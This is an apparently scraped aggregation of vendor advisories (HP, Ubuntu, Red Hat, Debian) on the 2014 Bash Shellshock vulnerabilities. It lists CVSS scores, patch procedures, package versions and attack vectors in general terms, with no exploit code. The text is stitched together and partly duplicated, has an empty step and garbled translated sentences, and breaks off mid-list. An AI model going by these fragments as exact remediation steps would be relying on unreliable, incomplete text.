Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. Please update the Bash shell version on the HP Insight Control for Linux Central Management Server also. On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
mkdir -p $HOME/tmp/bash
cd $HOME/tmp/bash
pwd
/tmp/bash
b.
c. Extract the Bash update software package.
rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv
d. Verify the version of the Bash update software:
./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
ldd ./bin/bash
linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system:
mkdir $HOME/tmp/lib
cd /lib
cp * $HOME/tmp/lib
cd $HOME/tmp
pwd
/tmp
tar cvf bash_lib.tar *
- Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there :
mkdir -p $HOME/tmp/temp-toolkit
cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz
$HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
cd $HOME/tmp/temp-toolkit
tar zxvf toolkit.tar.gz
mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
$HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc.
d. Verify dependencies versions:
ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations:
tar xvf $HOME/tmp/bash_lib
cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin
cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard
tar czvf toolkit.tar.gz *
cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
HP Product Firmware Version
HP StoreEver ESL G3 Tape Libraries with MCB version 2 680H_GS40701
HP StoreEver ESL G3 Tape Libraries with MCB version 1 656H_GS10801
The firmware is customer installable and is available in the Drivers, Software & Firmware section at the following location:
http://www.hp.com/support/eslg3
Notes:
- Updating the library firmware requires a reboot of the library.
Mitigation Instructions
HP recommends the following mitigation steps to reduce the risk of this vulnerability for HP StoreEver ESL G3 Tape Library. The shell is not accessible via the standard calibration or remote management interfaces. ============================================================================ Ubuntu Security Notice USN-2363-2 September 26, 2014
bash vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
Summary:
Bash allowed bypassing environment restrictions in certain environments. Due to a build issue, the patch for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.
We apologize for the inconvenience. (CVE-2014-7169)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.3
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: bash security update Advisory ID: RHSA-2014:1311-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html Issue date: 2014-09-26 CVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 =====================================================================
- Summary:
Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.
Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64 Red Hat Enterprise Linux AUS (v. 6.2 server) - x86_64 Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64 Red Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64 Red Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64 Red Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64
- Description:
The GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. (CVE-2014-7169)
Applications which directly create Bash functions as environment variables need to be made aware of the changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223
Note: Docker users are advised to use "yum update" within their containers, and to commit the resulting changes.
For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.
All bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux AS (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
ia64: bash-3.0-27.el4.4.i386.rpm bash-3.0-27.el4.4.ia64.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.ia64.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux ES (v. 4 ELS):
Source: bash-3.0-27.el4.4.src.rpm
i386: bash-3.0-27.el4.4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm
x86_64: bash-3.0-27.el4.4.x86_64.rpm bash-debuginfo-3.0-27.el4.4.x86_64.rpm
Red Hat Enterprise Linux LL (v. 5.6 server):
Source: bash-3.2-24.el5_6.2.src.rpm
i386: bash-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm
ia64: bash-3.2-24.el5_6.2.i386.rpm bash-3.2-24.el5_6.2.ia64.rpm bash-debuginfo-3.2-24.el5_6.2.i386.rpm bash-debuginfo-3.2-24.el5_6.2.ia64.rpm
x86_64: bash-3.2-24.el5_6.2.x86_64.rpm bash-debuginfo-3.2-24.el5_6.2.x86_64.rpm
Red Hat Enterprise Linux EUS (v. 5.9 server):
Source: bash-3.2-32.el5_9.3.src.rpm
i386: bash-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm
ia64: bash-3.2-32.el5_9.3.i386.rpm bash-3.2-32.el5_9.3.ia64.rpm bash-debuginfo-3.2-32.el5_9.3.i386.rpm bash-debuginfo-3.2-32.el5_9.3.ia64.rpm
ppc: bash-3.2-32.el5_9.3.ppc.rpm bash-debuginfo-3.2-32.el5_9.3.ppc.rpm
s390x: bash-3.2-32.el5_9.3.s390x.rpm bash-debuginfo-3.2-32.el5_9.3.s390x.rpm
x86_64: bash-3.2-32.el5_9.3.x86_64.rpm bash-debuginfo-3.2-32.el5_9.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux AUS (v. 6.2 server):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-4.1.2-9.el6_2.2.x86_64.rpm bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-4.1.2-15.el6_4.2.i686.rpm bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-4.1.2-15.el6_4.2.ppc64.rpm bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-4.1.2-15.el6_4.2.s390x.rpm bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-4.1.2-15.el6_4.2.x86_64.rpm bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.2):
Source: bash-4.1.2-9.el6_2.2.src.rpm
x86_64: bash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm bash-doc-4.1.2-9.el6_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.4):
Source: bash-4.1.2-15.el6_4.2.src.rpm
i386: bash-debuginfo-4.1.2-15.el6_4.2.i686.rpm bash-doc-4.1.2-15.el6_4.2.i686.rpm
ppc64: bash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm bash-doc-4.1.2-15.el6_4.2.ppc64.rpm
s390x: bash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm bash-doc-4.1.2-15.el6_4.2.s390x.rpm
x86_64: bash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm bash-doc-4.1.2-15.el6_4.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-7169.html https://www.redhat.com/security/data/cve/CVE-2014-7186.html https://www.redhat.com/security/data/cve/CVE-2014-7187.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/1200223
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
HP Vertica AMI's and Virtual Machines prior to v7.1.1-0.
HP has released the following updates to resolve this vulnerability for HP Vertica products.
Update to the latest VM image available at: https://my.vertica.com
For customers using the AMI version HP Vertica Analytics platform, please install the latest image available at Amazon. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2014 Hewlett-Packard Development Company, L.P. The unit provides Calibration Software running on embedded Linux, which includes a Bash Shell. The software is used for service purposes only.
NOTE: The vCAS product is vulnerable only if DHCP is enabled.
NOTE: HP recommends to not power-down or disconnect the vCAS until the update is available.
MITIGATION INFORMATION
A Shellshock attack requires the definition of an environment variable introduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd web server, and the DHCP client.
- The exploit does not elevate privileges.
The DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP exploit can be mitigated by ensuring that DHCP is disabled on the vCAS.
Note: HP strongly discourages the use of DHCP on the vCAS.
The web UI forces the vCAS user to assign a static IP address and change the hp-admin password. A vCAS user must manually configure DHCP for use on the vCAS.
A vCAS user can verify that DHCP is disabled by inspecting the file "/etc/network/interfaces" and ensuring that the "iface" line for device "eth0" is set for a static IP
Show details on source website{
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"description": {
"_id": null,
"data": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nGNU Bash 3.2 and later are vulnerable; prior versions may also be affected. \n\nThis vulnerability allows users that have been granted access to a shell\nscript to escalate privilege and execute unrestricted commands at the same\nsecurity level as the Bash script. Customers who\nneed to upgrade the firmware of their Superdome X or HP Converged System 900\nfor SAP HANA should contact HP Technical Support to obtain the firmware or\nplan to schedule an onsite visit with an HP Services field service\nprofessional. \n\nNOTE: HP strongly recommends implementing the following security best\npractices to help reduce both known and future security vulnerability risks:\n\nIsolate the HP Superdome X or HP Converged System 900 for SAP HANA\u0027s\nmanagement network by keeping it separate from the data or production\nnetwork, and not connecting it directly to the Internet without additional\naccess authentication. \nPatch and maintain Lightweight Directory Access Protocol (LDAP) and web\nservers. \nUse virus scanners, intrusion detection/prevention systems (IDS/IPS), and\nvulnerability scanners regularly. \n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat\u0027s internal analysis for these\nissues and also independently reported by Todd Sabin. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04558068\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04558068\nVersion: 1\n\nHPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server\nPre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-02-02\nLast Updated: 2015-02-02\n\nPotential Security Impact: Multiple vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Insight\nControl for Linux Central Management Server Pre-boot Execution Environment\nthat could be exploited remotely resulting in Denial of Service (DoS),\ndisclosure of information, and other vulnerabilities. \n\nReferences:\n\nCVE-2014-6271\nCVE-2014-6277\nCVE-2014-6278\nCVE-2014-7169\nCVE-2014-7186\nCVE-2014-7187\nCVE-2014-7196\nSSRT101742\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control for Linux Central Management Server Pre-boot Execution\nEnvironment running Bash Shell\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following instructions to resolve these vulnerabilities. \n\nFollow these steps to update the HP Insight Control for Linux Central\nManagement Server Pre-boot Execution Environment:\n\nNOTE: The following procedure updates the bash shell on the Linux Pre-boot\nExecution Environment. Please update the Bash shell version on the HP Insight\nControl for Linux Central Management Server also. On the Production RHEL 6.2 OS:\n\na. Prepare temporary directory for Bash update software:\n\n# mkdir -p $HOME/tmp/bash\n# cd $HOME/tmp/bash\n# pwd\n\u003chome directory\u003e/tmp/bash\n\nb. \n\nc. Extract the Bash update software package. \n\n# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv\n\nd. Verify the version of the Bash update software:\n\n# ./bin/bash --version\nGNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)\n\ne. Verify version dependencies:\n\n# ldd ./bin/bash\n\nlinux-gate.so.1 =\u003e (0x008a7000)\nlibtinfo.so.5 =\u003e /lib/libtinfo.so.5 (0x00459000)\nlibdl.so.2 =\u003e /lib/libdl.so.2 (0x002c0000)\nlibc.so.6 =\u003e /lib/libc.so.6 (0x0012e000)\n/lib/ld-linux.so.2 (0x00108000)\n\nf. Create archive file from \u0027/lib\u0027 to copy and install on the Insight Control\nfor Linux Central Management Server Pre-boot Execution Environment system:\n\n# mkdir $HOME/tmp/lib\n# cd /lib\n# cp * $HOME/tmp/lib\n# cd $HOME/tmp\n# pwd\n\u003chome directory\u003e/tmp\n# tar cvf bash_lib.tar *\n\n2. Download the new archive file \u0027$HOME/tmp/bash_lib.tar\u0027 from the Production\nRHEL 6.2 OS system to the Insight Control for Linux Central Management Server\nPre-boot Execution Environment system. On the HP Insight Control for Linux Central Managment Server Pre-boot\nExecution Environment system:\n\na. Create a temporary folder for the toolkit and copy the toolkit there :\n\n# mkdir -p $HOME/tmp/temp-toolkit\n# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz\n$HOME/tmp/temp-toolkit\n\nb. Extract the file \u0027toolkit.tar.gz\u0027 into the temporary folder:\n\n# cd $HOME/tmp/temp-toolkit\n# tar zxvf toolkit.tar.gz\n# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp\n\nc. Verify the version of the toolkit Bash:\n\n# $HOME/tmp/temp-toolkit/bin/bash --version\nGNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005\nFree Software Foundation, Inc. \n\nd. Verify dependencies versions:\n\n# ldd $HOME/tmp/temp-toolkit/bin/bash\n\nlinux-gate.so.1 =\u003e (0xffffe000)\nlibtermcap.so.2 =\u003e /lib/libtermcap.so.2 (0xf7f8c000)\nlibdl.so.2 =\u003e /lib/libdl.so.2 (0x008bf000)\nlibc.so.6 =\u003e /lib/libc.so.6 (0x00777000)\n/lib/ld-linux.so.2 (0x00755000)\n\ne. Extract the archive \u0027bash_lib.tar\u0027 to directory \u0027$HOME/tmp/bash_lib\u0027 . \nThen copy the bash binary and the library files to their respective\nlocations:\n\n# tar xvf $HOME/tmp/bash_lib\n# cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin\n# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib\n\nf. Create the updated toolkit gzipped archive file and place in\n/usr/share/systemimager/boot/i386/standard\n\n# tar czvf toolkit.tar.gz *\n# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard\n\nHISTORY\nVersion:1 (rev.1) - 2 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n HP Product\n Firmware Version\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 2\n 680H_GS40701\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 1\n 656H_GS10801\n\n The firmware is customer installable and is available in the Drivers,\nSoftware \u0026 Firmware section at the following location:\n\n http://www.hp.com/support/eslg3\n\n Notes:\n\n - Updating the library firmware requires a reboot of the library. \n\nMitigation Instructions\n\n HP recommends the following mitigation steps to reduce the risk of this\nvulnerability for HP StoreEver ESL G3 Tape Library. The shell is not accessible via the standard\ncalibration or remote management interfaces. ============================================================================\nUbuntu Security Notice USN-2363-2\nSeptember 26, 2014\n\nbash vulnerability\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nBash allowed bypassing environment restrictions in certain environments. Due to a build issue, the patch\nfor CVE-2014-7169 didn\u0027t get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem. \n\nWe apologize for the inconvenience. (CVE-2014-7169)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n bash 4.3-7ubuntu1.3\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: bash security update\nAdvisory ID: RHSA-2014:1311-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html\nIssue date: 2014-09-26\nCVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 \n=====================================================================\n\n1. Summary:\n\nUpdated bash packages that fix one security issue are now available for Red\nHat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise\nLinux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support,\nRed Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat\nEnterprise Linux 6.4 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64\nRed Hat Enterprise Linux AUS (v. 6.2 server) - x86_64\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64\nRed Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64\n\n3. Description:\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux. \n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create Bash functions as environment variables\nneed to be made aware of the changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes. \n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article. \n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux AS (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nia64:\nbash-3.0-27.el4.4.i386.rpm\nbash-3.0-27.el4.4.ia64.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.ia64.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux ES (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux LL (v. 5.6 